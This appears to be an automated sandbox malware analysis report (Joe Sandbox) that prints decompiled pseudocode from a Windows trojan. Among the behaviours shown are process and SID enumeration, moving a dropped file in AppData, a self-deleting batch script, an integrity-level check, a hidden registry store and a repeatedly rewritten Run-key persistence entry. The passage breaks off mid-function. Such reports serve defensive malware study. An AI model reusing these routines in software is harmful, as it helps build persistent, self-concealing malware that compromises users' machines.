							_t72 = E0040F311(_t65, _t73,  &_v32);
							CloseHandle(_t73);
							__eflags = _t72;
							if(_t72 == 0) {
								L18:
								_t71 = 0;
								__eflags = 0;
								goto L19;
							} else {
								__eflags = _v32 -  *0x4192e0; // 0x1
								if(__eflags == 0) {
									_t56 = GetLengthSid( *_t72);
									__eflags = _t56 -  *0x4192d8;
									if(_t56 ==  *0x4192d8) {
										_t57 =  *0x4192d4; // 0x201f7d0
										_t59 = E00409868( *_t57,  *_t72, _t56);
										__eflags = _t59;
										if(_t59 == 0) {
											_t60 = E00409787(4 + _v12 * 4,  &_v16);
											__eflags = _t60;
											if(_t60 != 0) {
												_t70 = _v12;
												_v12 = _v12 + 1;
												_v24 = _v24 + 1;
												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v580;
												_t62 = E00413B6A(_v16, _v580, _v28);
												__eflags = _t62;
												if(_t62 != 0) {
													_v5 = 1;
												}
											}
										}
									}
								}
								E004097F7(_t72);
								goto L18;
							}
						} else {
							goto L6;
						}
						while(1) {
							L6:
							_t70 = _v16;
							__eflags =  *((intOrPtr*)(_t70 + _t47 * 4)) - _t65;
							if( *((intOrPtr*)(_t70 + _t47 * 4)) == _t65) {
								goto L20;
							}
							_t47 = _t47 + 1;
							__eflags = _t47 - _v12;
							if(_t47 < _v12) {
								continue;
							}
							goto L8;
						}
						goto L20;
					}
					CloseHandle(_v20);
					if(_v24 != _t71) {
						continue;
					}
					break;
				}
				E004097F7(_v16);
				return _v5;
			}

0x00413c05
0x00413c07
0x00413c0b
0x00413c0e
0x00413c11
0x00413c14
0x00413c19
0x00413c1c
0x00413c22
0x00000000
0x00413c28
0x00413c28
0x00413c32
0x00413c3c
0x00413c3c
0x00413d44
0x00413c46
0x00413c4c
0x00413c4e
0x00413d35
0x00413d3f
0x00000000
0x00413d3f
0x00413c54
0x00413c5a
0x00000000
0x00000000
0x00413c60
0x00413c62
0x00413c65
0x00413c79
0x00413c7a
0x00413c7f
0x00413c82
0x00413c84
0x00000000
0x00000000
0x00413c9c
0x00413c9e
0x00413ca0
0x00413d30
0x00413d33
0x00000000
0x00413d33
0x00413cb1
0x00413cb3
0x00413cb5
0x00413cb7
0x00413d2e
0x00413d2e
0x00413d2e
0x00000000
0x00413cb9
0x00413cbc
0x00413cc2
0x00413cc6
0x00413ccc
0x00413cd2
0x00413cd7
0x00413cde
0x00413ce3
0x00413ce5
0x00413cf4
0x00413cf9
0x00413cfb
0x00413cfd
0x00413d0c
0x00413d0f
0x00413d12
0x00413d1b
0x00413d20
0x00413d22
0x00413d24
0x00413d24
0x00413d22
0x00413cfb
0x00413ce5
0x00413cd2
0x00413d29
0x00000000
0x00413d29
0x00000000
0x00000000
0x00000000
0x00413c67
0x00413c67
0x00413c67
0x00413c6a
0x00413c6d
0x00000000
0x00000000
0x00413c73
0x00413c74
0x00413c77
0x00000000
0x00000000
0x00000000
0x00413c77
0x00000000
0x00413c67
0x00413d4f
0x00413d54
0x00000000
0x00000000
0x00000000
0x00413d54
0x00413d5d
0x00413d69

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413C14
Process32FirstW.KERNEL32(0040808A,?), ref: 00413C3C
OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,00000000), ref: 00413C96
CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00413CB3
GetLengthSid.ADVAPI32(00000000,?,?,00000000), ref: 00413CC6
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00413D33
Process32NextW.KERNEL32(0040808A,0000022C), ref: 00413D3F
CloseHandle.KERNEL32(0040808A,?,?,00000000), ref: 00413D4F

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 1981844004-0
Opcode ID: 55e17d62d64d8e0536130c74840e60f1853602f54c2fa748d326bdb61bfc65a4
Instruction ID: 25d894fc2888be2c27f1fba0c79735ae16ee64a55ae2a5180fa541943dfd7bc8
Opcode Fuzzy Hash: 55e17d62d64d8e0536130c74840e60f1853602f54c2fa748d326bdb61bfc65a4
Instruction Fuzzy Hash: 06419D71800119EBCF21EFA5ED859EEBBB5EF85306F1004AAE514B3261D7395EC1CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00411E7C, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 198
stringCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E00411E7C(WCHAR* __ecx, short _a4) {
				char _v268;
				char _v697;
				signed char _v764;
				signed char _v800;
				char _v1012;
				short _v1532;
				short _v1536;
				signed int _v1540;
				short _v1544;
				void* _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				char _v1560;
				intOrPtr _v1564;
				signed int _v1568;
				signed int _v1572;
				void* _v1573;
				signed int _v1576;
				void* __ebx;
				void* __esi;
				signed int _t54;
				void* _t55;
				signed int _t63;
				signed char _t65;
				signed int _t67;
				signed int _t75;
				signed int _t78;
				long _t79;
				long _t80;
				signed int _t84;
				void* _t87;
				signed int _t90;
				signed int _t93;
				signed int _t100;
				signed int _t102;
				signed char _t118;
				signed int _t121;
				short _t125;
				void* _t128;
				WCHAR* _t131;

				_t122 = __ecx;
				_t125 = _a4;
				_t54 = E00407A11(__ecx, (0 |  *_t125 != 0x00000000) + 0x78d0c213, 2);
				_v1572 = _t54;
				if(_t54 != 0) {
					_t55 =  *0x419798; // 0x12c
					_v1548 = _t55;
					_v1544 =  &_v268;
					_v1556 = E00411CD8;
					_v1552 = E00411E14;
					_v1536 = _t125;
					E00407B53( &_v1012);
					E00409833( &_v268,  &_v697, 0x102);
					_t63 =  *_t125 & 0x000000ff;
					__eflags = _t63;
					if(_t63 == 0) {
						_t65 = _v800 >> 8;
						__eflags = _t65;
						_v1568 = _t65 & 0x000000ff;
						_t67 = _v800 & 0x000000ff;
						goto L7;
					} else {
						__eflags = _t63 == 1;
						if(_t63 == 1) {
							_v1568 = _v764 >> 0x00000008 & 0x000000ff;
							_t67 = _v764 & 0x000000ff;
							L7:
							_v1572 = _t67;
						}
					}
					_v1568 = _v1568 * 0xea60;
					_v1572 = _v1572 * 0xea60;
					E004098AA( &_v1012,  &_v1012, 0, 0x2e4);
					_v1544 = 0;
					_t75 = E00407B3F();
					__eflags = _t75;
					if(_t75 != 0) {
						do {
							__eflags =  *_t125;
							_v1573 = 1;
							if( *_t125 != 0) {
								L23:
								_t78 = E00410CA6(_t122);
								_t130 = _t78;
								__eflags = _t78;
								if(__eflags == 0) {
									goto L32;
								} else {
									_v1572 = E00410520(0, _t123, __eflags, _t130, 0x4e23, 0x10000000);
									E004097F7(_t130);
									__eflags = _v1576;
									if(_v1576 == 0) {
										L28:
										_t118 = _v1573;
									} else {
										_v1540 = _v1540 & 0;
										_t100 = E00411A9D(_t122, _t123,  &_v1540, 1);
										__eflags = _t100;
										if(_t100 == 0) {
											goto L28;
										} else {
											 *(_t125 + 8) =  *(_t125 + 8) | 0xffffffff;
											_t102 = E00412279( &_v1560);
											__eflags = _t102;
											_t118 = (0 | _t102 != 0x00000000) - 0x00000001 & 0x00000002;
											E00410951(_t125 + 8);
											E004097F7(_v1540);
										}
									}
									E004097F7(_v1560);
									__eflags = _t118 - 2;
									if(_t118 != 2) {
										_t79 = _v1568;
										__eflags = _t118;
										if(_t118 != 0) {
											goto L32;
										}
									} else {
										_t79 = _v1572;
									}
								}
							} else {
								asm("sbb ebx, ebx");
								E00411954( !( ~(_v1532 & 0x0000ffff)) &  &_v1532, _t122, 0);
								_t131 = _t125 + 0x122;
								_t84 = GetFileAttributesW( &_v1536);
								__eflags = _t84 - 0xffffffff;
								if(_t84 == 0xffffffff) {
									_t84 = GetFileAttributesW(L"C:\\Users\\Jamey\\AppData\\Roaming\\Ytveig\\adyq.cik");
									__eflags = _t84 - 0xffffffff;
									if(_t84 == 0xffffffff) {
										goto L32;
									} else {
										_t122 = L"C:\\Users\\Jamey\\AppData\\Roaming\\Ytveig\\adyq.cik";
										goto L14;
									}
								} else {
									_t122 =  &_v1532;
									L14:
									_t123 = _t131;
									E00409AD3(_t84 | 0xffffffff, _t122, _t123);
									_t87 = E0040B18C(_t123, _t131);
									__eflags = _t87 - 0xffffffff;
									if(_t87 != 0xffffffff) {
										L16:
										__eflags = _t123;
										if(__eflags > 0) {
											goto L27;
										} else {
											if(__eflags < 0) {
												L19:
												_t90 = lstrcmpiW(_t131,  &_v1532);
												__eflags = _t90;
												if(_t90 == 0) {
													goto L23;
												} else {
													_t121 = E00407A11(_t122, 0x8793aef0, 2);
													__eflags = _t121;
													if(_t121 == 0) {
														goto L32;
													} else {
														_t93 = MoveFileExW(_t131,  &_v1532, 0xb);
														__eflags = _t93;
														if(_t93 == 0) {
															goto L32;
														} else {
															E0040DD1D(_t121);
															__eflags = _t93 | 0xffffffff;
															_t122 =  &_v1536;
															_t123 = _t131;
															E00409AD3(_t93 | 0xffffffff,  &_v1536, _t131);
															goto L23;
														}
													}
												}
											} else {
												__eflags = _t87 - 0xffffffff;
												if(_t87 > 0xffffffff) {
													goto L27;
												} else {
													goto L19;
												}
											}
										}
									} else {
										__eflags = _t123;
										if(_t123 == 0) {
											L27:
											E0040B1CD(_t131);
											L32:
											_t79 = 0x7530;
										} else {
											goto L16;
										}
									}
								}
							}
							_t80 = WaitForSingleObject( *0x419798, _t79);
							__eflags = _t80 - 0x102;
						} while (_t80 == 0x102);
					}
					E0040DD1D(_v1564);
					_t128 = 0;
				} else {
					_t128 = 1;
				}
				E004097F7(_t125);
				return _t128;
			}

0x00411e7c
0x00411e8b
0x00411e9f
0x00411ea4
0x00411eaa
0x00411ec0
0x00411ec5
0x00411ed0
0x00411edb
0x00411ee3
0x00411eeb
0x00411eef
0x00411f09
0x00411f11
0x00411f11
0x00411f13
0x00411f3a
0x00411f3a
0x00411f40
0x00411f44
0x00000000
0x00411f15
0x00411f15
0x00411f16
0x00411f25
0x00411f29
0x00411f4c
0x00411f4c
0x00411f4c
0x00411f16
0x00411f5a
0x00411f6d
0x00411f7a
0x00411f81
0x00411f86
0x00411f8b
0x00411f8d
0x00411f93
0x00411f93
0x00411f96
0x00411f9b
0x0041206c
0x0041206c
0x00412071
0x00412073
0x00412075
0x00000000
0x0041207b
0x0041208e
0x00412092
0x00412097
0x0041209b
0x004120e2
0x004120e2
0x0041209d
0x0041209d
0x004120a8
0x004120ad
0x004120af
0x00000000
0x004120b1
0x004120b4
0x004120bb
0x004120c0
0x004120c7
0x004120ca
0x004120d3
0x004120d3
0x004120af
0x004120ea
0x004120ef
0x004120f2
0x004120fa
0x004120fe
0x00412100
0x00000000
0x00000000
0x004120f4
0x004120f4
0x004120f4
0x004120f2
0x00411fa1
0x00411fa8
0x00411fb4
0x00411fc4
0x00411fca
0x00411fcc
0x00411fcf
0x00411fdc
0x00411fde
0x00411fe1
0x00000000
0x00411fe7
0x00411fe7
0x00000000
0x00411fe7
0x00411fd1
0x00411fd1
0x00411fec
0x00411fef
0x00411ff1
0x00411ff7
0x00411ffc
0x00411fff
0x00412009
0x00412009
0x0041200b
0x00000000
0x00412011
0x00412011
0x0041201c
0x00412022
0x00412028
0x0041202a
0x00000000
0x0041202c
0x00412038
0x0041203a
0x0041203c
0x00000000
0x00412042
0x0041204a
0x00412050
0x00412052
0x00000000
0x00412058
0x00412059
0x0041205e
0x00412061
0x00412065
0x00412067
0x00000000
0x00412067
0x00412052
0x0041203c
0x00412013
0x00412013
0x00412016
0x00000000
0x00000000
0x00000000
0x00000000
0x00412016
0x00412011
0x00412001
0x00412001
0x00412003
0x004120da
0x004120db
0x00412102
0x00412102
0x00000000
0x00000000
0x00000000
0x00412003
0x00411fff
0x00411fcf
0x0041210e
0x00412114
0x00412114
0x00411f93
0x00412123
0x00412128
0x00411eac
0x00411eae
0x00411eae
0x00411eb0
0x00411ebd

APIs

Part of subcall function 00407A11: CreateMutexW.KERNEL32(0041930C,00000000,?,?,?,?,?), ref: 00407A32

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,000002E4,?,?,00000102), ref: 00411FCA
lstrcmpiW.KERNEL32(?,?,?), ref: 00412022
MoveFileExW.KERNEL32(?,?,0000000B,8793AEF0,00000002), ref: 0041204A

Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A

Strings

C:\Users\Jamey\AppData\Roaming\Ytveig\adyq.cik, xrefs: 00411FD7, 00411FE7

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: File$AttributesCreateFreeHeapMoveMutexlstrcmpi
String ID: C:\Users\Jamey\AppData\Roaming\Ytveig\adyq.cik
API String ID: 1600310851-4237285778
Opcode ID: 28b3f19588a2acba39d3beb5b006fb2b127ad07ddcdf98b9e457a8b6b7a0439d
Instruction ID: 26a87faf6bb2eb0c63d07739b0bb6026e2e707ae1a0b685e3e67b5e10d26ea3a
Opcode Fuzzy Hash: 28b3f19588a2acba39d3beb5b006fb2b127ad07ddcdf98b9e457a8b6b7a0439d
Instruction Fuzzy Hash: 8D61E271608351AAC310EF65C981AEFBBD4EF85314F000A2FF694E62D1D778CA95C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0040EABE, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040EABE(void* __ebx, char _a4) {
				short _v24;
				intOrPtr _v28;
				char _v72;
				short _v592;
				char _v852;
				char _v1392;
				void* __edi;
				void* _t33;
				char _t55;

				if(E0040B1EE(L"bat",  &_v592) == 0) {
					L7:
					return 0;
				}
				CharToOemW( &_v592,  &_v852);
				_push( &_v852);
				if(E0040A545( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
					L6:
					E0040B1CD( &_v592);
					goto L7;
				}
				_t33 = E0040AFDF(_t30,  &_v592, _a4);
				E004097F7(_a4);
				if(_t33 == 0) {
					goto L6;
				}
				_push( &_v592);
				if(E0040A4B7( &_v592, 0x10e,  &_v1392, L"/c \"%s\"") <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
					goto L6;
				} else {
					_t55 = 0x44;
					E004098AA( &_v72,  &_v72, 0, _t55);
					_v24 = 0;
					_v72 = _t55;
					_v28 = 1;
					return E0040F5C2( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t46 != 0x00000000;
				}
			}

0x0040eadb
0x0040ebc4
0x00000000
0x0040ebc4
0x0040eaef
0x0040eafb
0x0040eb13
0x0040ebb8
0x0040ebbf
0x00000000
0x0040ebbf
0x0040eb26
0x0040eb30
0x0040eb38
0x00000000
0x00000000
0x0040eb40
0x0040eb5b
0x00000000
0x0040eb7c
0x0040eb7e
0x0040eb86
0x0040eb8e
0x0040eba2
0x0040eba5
0x00000000
0x0040ebb3

APIs

Part of subcall function 0040B1EE: GetTempPathW.KERNEL32(000000F6,?), ref: 0040B205

CharToOemW.USER32 ref: 0040EAEF

Part of subcall function 0040AFDF: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0040B261,?,00000000,?,?), ref: 0040AFF9
Part of subcall function 0040AFDF: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040B261,?,00000000,?,?), ref: 0040B019
Part of subcall function 0040AFDF: CloseHandle.KERNEL32(00000000,?,0040B261,?,00000000,?,?), ref: 0040B02B

Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A

GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000), ref: 0040EB6E

Strings

@echo off%sdel /F "%s", xrefs: 0040EB02
ComSpec, xrefs: 0040EB69
/c "%s", xrefs: 0040EB41
bat, xrefs: 0040EACF

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
API String ID: 1639923935-3344086482
Opcode ID: 70087b90885a3d485b699138e7d85fffdda7bfff4a2d4fd2bbd12a3c535562a3
Instruction ID: 2bd4613fb3dc1b0ba9d75ff118508478ec04c89fc055936f25eb8791cad67ff0
Opcode Fuzzy Hash: 70087b90885a3d485b699138e7d85fffdda7bfff4a2d4fd2bbd12a3c535562a3
Instruction Fuzzy Hash: D321B4725011086ADF10EAA5CC46FEE73BCDB44314F2045B7F509F21D1D6789B998B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040F44B, Relevance: 10.6, APIs: 7, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040F44B(void* __ecx) {
				long _v8;
				void* _v12;
				char* _t21;
				signed char _t22;
				DWORD* _t25;
				void* _t35;

				_t28 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
					L15:
					return _t28;
				}
				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L14:
					CloseHandle(_v12);
					goto L15;
				} else {
					_t16 = _v8;
					if(_v8 == 0) {
						goto L14;
					}
					_t35 = E004097CC(_t16);
					if(_t35 == 0) {
						L13:
						goto L14;
					}
					if(GetTokenInformation(_v12, 0x19, _t35, _v8,  &_v8) != 0) {
						_t21 = GetSidSubAuthorityCount( *_t35);
						if(_t21 != 0) {
							_t22 =  *_t21;
							if(_t22 > 0) {
								_t25 = GetSidSubAuthority( *_t35, (_t22 & 0x000000ff) - 1);
								if(_t25 != 0) {
									if( *_t25 >= 0x2000) {
										asm("sbb bl, bl");
										_t28 = 3;
									} else {
										_t28 = 1;
									}
								}
							}
						}
					}
					E004097F7(_t35);
					goto L13;
				}
			}

0x0040f459
0x0040f463
0x0040f4fd
0x0040f501
0x0040f501
0x0040f47f
0x0040f4f3
0x0040f4f6
0x00000000
0x0040f48c
0x0040f48c
0x0040f491
0x00000000
0x00000000
0x0040f499
0x0040f49d
0x0040f4f2
0x00000000
0x0040f4f2
0x0040f4b0
0x0040f4b4
0x0040f4bc
0x0040f4be
0x0040f4c2
0x0040f4cb
0x0040f4d3
0x0040f4dc
0x0040f4e7
0x0040f4e9
0x0040f4de
0x0040f4de
0x0040f4de
0x0040f4dc
0x0040f4d3
0x0040f4c2
0x0040f4bc
0x0040f4ed
0x00000000
0x0040f4ed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,00407564,00000000,00407832,?,00000000), ref: 0040F45B
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 0040F47B
GetLastError.KERNEL32(?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 0040F481

Part of subcall function 004097CC: HeapAlloc.KERNEL32(00000008,-00000004,0040F499,00000000,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 004097D8

GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 0040F4AC
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 0040F4B4
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 0040F4CB
CloseHandle.KERNEL32(?,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 0040F4F6

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Token$AuthorityInformation$AllocCloseCountErrorHandleHeapLastOpenProcess
String ID:
API String ID: 2107185229-0
Opcode ID: 38e15f6b2d6601b6d3c3f124dba1bcd5177b35f8b0e923fcbaa375b174d6ed31
Instruction ID: 0b892696b9090dc08235a5fb8a431d8a2efc73d22333941e1aa92e08f95fe61b
Opcode Fuzzy Hash: 38e15f6b2d6601b6d3c3f124dba1bcd5177b35f8b0e923fcbaa375b174d6ed31
Instruction Fuzzy Hash: C7118132600009AFEB315F94DE84EAF7BADEB11354F240476F940F65A1D7399E89E628

Uniqueness

Uniqueness Score: -1.00%

Function 0040EEE6, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EEE6(void* __ecx, void* _a4, short* _a8, short* _a12, int* _a16, char** _a20) {
				int _v8;
				int* _v12;
				int _t30;
				char* _t41;

				_v12 = _v12 | 0xffffffff;
				 *_a20 = 0;
				if(_a8 == 0 || RegOpenKeyExW(_a4, _a8, 0, 1,  &_a4) == 0) {
					_v8 = 0;
					if(RegQueryValueExW(_a4, _a12, 0, _a16, 0,  &_v8) == 0) {
						_t30 = _v8;
						if(_t30 != 0) {
							_t31 = _t30 + 4;
							if(_t30 + 4 != 0) {
								_t41 = E004097CC(_t31);
								if(_t41 != 0) {
									if(RegQueryValueExW(_a4, _a12, 0, _a16, _t41,  &_v8) == 0) {
										 *_a20 = _t41;
										_v12 = _v8;
									} else {
										E004097F7(_t41);
									}
								}
							}
						} else {
							_v12 = 0;
						}
					}
					if(_a8 != 0) {
						RegCloseKey(_a4);
					}
					goto L13;
				} else {
					L13:
					return _v12;
				}
			}

0x0040eeeb
0x0040eef5
0x0040eefa
0x0040ef22
0x0040ef30
0x0040ef32
0x0040ef37
0x0040ef3e
0x0040ef43
0x0040ef4b
0x0040ef4f
0x0040ef64
0x0040ef71
0x0040ef76
0x0040ef66
0x0040ef67
0x0040ef67
0x0040ef64
0x0040ef79
0x0040ef39
0x0040ef39
0x0040ef39
0x0040ef37
0x0040ef7e
0x0040ef83
0x0040ef83
0x00000000
0x0040ef89
0x0040ef89
0x0040ef8e
0x0040ef8e

APIs

RegOpenKeyExW.ADVAPI32(000000FF,?,00000000,00000001,000000FF,SOFTWARE\Microsoft\Qodit,?,?,?,00413F00,80000001,SOFTWARE\Microsoft\Qodit,Ereqeren,00407CD9,?,?), ref: 0040EF09

Part of subcall function 004097CC: HeapAlloc.KERNEL32(00000008,-00000004,0040F499,00000000,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 004097D8

RegQueryValueExW.ADVAPI32(000000FF,?,00000000,00407CD9,00000000,00000049,Ereqeren,SOFTWARE\Microsoft\Qodit,?,?,?,00413F00,80000001,SOFTWARE\Microsoft\Qodit,Ereqeren,00407CD9), ref: 0040EF2C
RegQueryValueExW.ADVAPI32(000000FF,?,00000000,00407CD9,00000000,00000049,00000000,?,?,?,00413F00,80000001,SOFTWARE\Microsoft\Qodit,Ereqeren,00407CD9,?), ref: 0040EF60

Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A

RegCloseKey.ADVAPI32(000000FF,?,?,00413F00,80000001,SOFTWARE\Microsoft\Qodit,Ereqeren,00407CD9,?,?), ref: 0040EF83

Strings

SOFTWARE\Microsoft\Qodit, xrefs: 0040EEF2
Ereqeren, xrefs: 0040EF13

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: HeapQueryValue$AllocCloseFreeOpen
String ID: Ereqeren$SOFTWARE\Microsoft\Qodit
API String ID: 1185057095-464494599
Opcode ID: 1adfeacfd77744eb7a5818d497338b45fdb2ec2c4ae775521b88f80f5e8f99c5
Instruction ID: 46100616f2e97f8878b45fccea5af6e60a61da11a3fa4edf364ce0fca99450fd
Opcode Fuzzy Hash: 1adfeacfd77744eb7a5818d497338b45fdb2ec2c4ae775521b88f80f5e8f99c5
Instruction Fuzzy Hash: 7021277550020AFFDF218F96CD80CAFBFB9EB85750B108526F805A6260D375DEA1DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00415834, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415834(void* __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v112;
				char _v632;
				void* __edi;
				void* __esi;
				intOrPtr _t16;
				void* _t36;
				WCHAR* _t39;

				_t36 = __ecx;
				SetThreadPriority(GetCurrentThread(), 0);
				_t16 = E00407A11(_t36, 0x19367401, 1);
				_v12 = _t16;
				if(_t16 != 0) {
					E004079D9(0xff220823,  &_v112, 0);
					_t39 =  &_v632;
					E00407BD4(_t36, _t39, 0, 0);
					PathQuoteSpacesW(_t39);
					_t37 = _t39;
					_v8 = E0040A3AA(_t39);
					if(E00407B3F() == 0) {
						L7:
						E0040DD1D(_v12);
						return 0;
					}
					if(WaitForSingleObject( *0x419798, 0xc8) != 0x102) {
						L6:
						goto L7;
					}
					_v8 = _v8 + _v8 + 2;
					do {
						E0040EE81(_t37, L"Software\\Microsoft\\Windows\\Currentversion\\Run",  &_v112, 1,  &_v632, _v8);
					} while (WaitForSingleObject( *0x419798, 0xc8) == 0x102);
					goto L6;
				}
				return 1;
			}

0x00415834
0x00415848
0x00415855
0x0041585a
0x0041585f
0x00415874
0x0041587a
0x00415880
0x00415888
0x0041588e
0x00415895
0x0041589f
0x004158ef
0x004158f2
0x00000000
0x004158f9
0x004158bb
0x004158ee
0x00000000
0x004158ee
0x004158c4
0x004158c7
0x004158dc
0x004158ea
0x00000000
0x004158c7
0x00000000

APIs

GetCurrentThread.KERNEL32 ref: 00415841
SetThreadPriority.KERNEL32(00000000), ref: 00415848

Part of subcall function 00407A11: CreateMutexW.KERNEL32(0041930C,00000000,?,?,?,?,?), ref: 00407A32

PathQuoteSpacesW.SHLWAPI(?,00000000,FF220823,?,00000000,?,19367401,00000001), ref: 00415888
WaitForSingleObject.KERNEL32(000000C8,?,?,19367401,00000001), ref: 004158B4
WaitForSingleObject.KERNEL32(000000C8,Software\Microsoft\Windows\Currentversion\Run,?,00000001,?,?,?,?,19367401,00000001), ref: 004158E8

Strings

Software\Microsoft\Windows\Currentversion\Run, xrefs: 004158D7

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
String ID: Software\Microsoft\Windows\Currentversion\Run
API String ID: 123286213-3548470437
Opcode ID: 843315c493ea4593c9cc4102cf01530f3c52d7d6a8f2f028cfab193abd351bbd
Instruction ID: 5403b607c557c4c5fbc9cf29adff4b919678268e02161f6a1b081f58063b7407
Opcode Fuzzy Hash: 843315c493ea4593c9cc4102cf01530f3c52d7d6a8f2f028cfab193abd351bbd
Instruction Fuzzy Hash: 70119D71E00118AEDB11BBA19C85DEE7B7DEF84308F10447AF905F7191D6385E928B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E875, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E875(short* _a4) {
				char _v5;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				long _t18;

				_v5 = 0;
				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
				_t33 = _t18;
				if(_t18 == 0) {
					_v12 = 0;
					do {
						E0040E6D9(6, 4, _t33, 2, _a4);
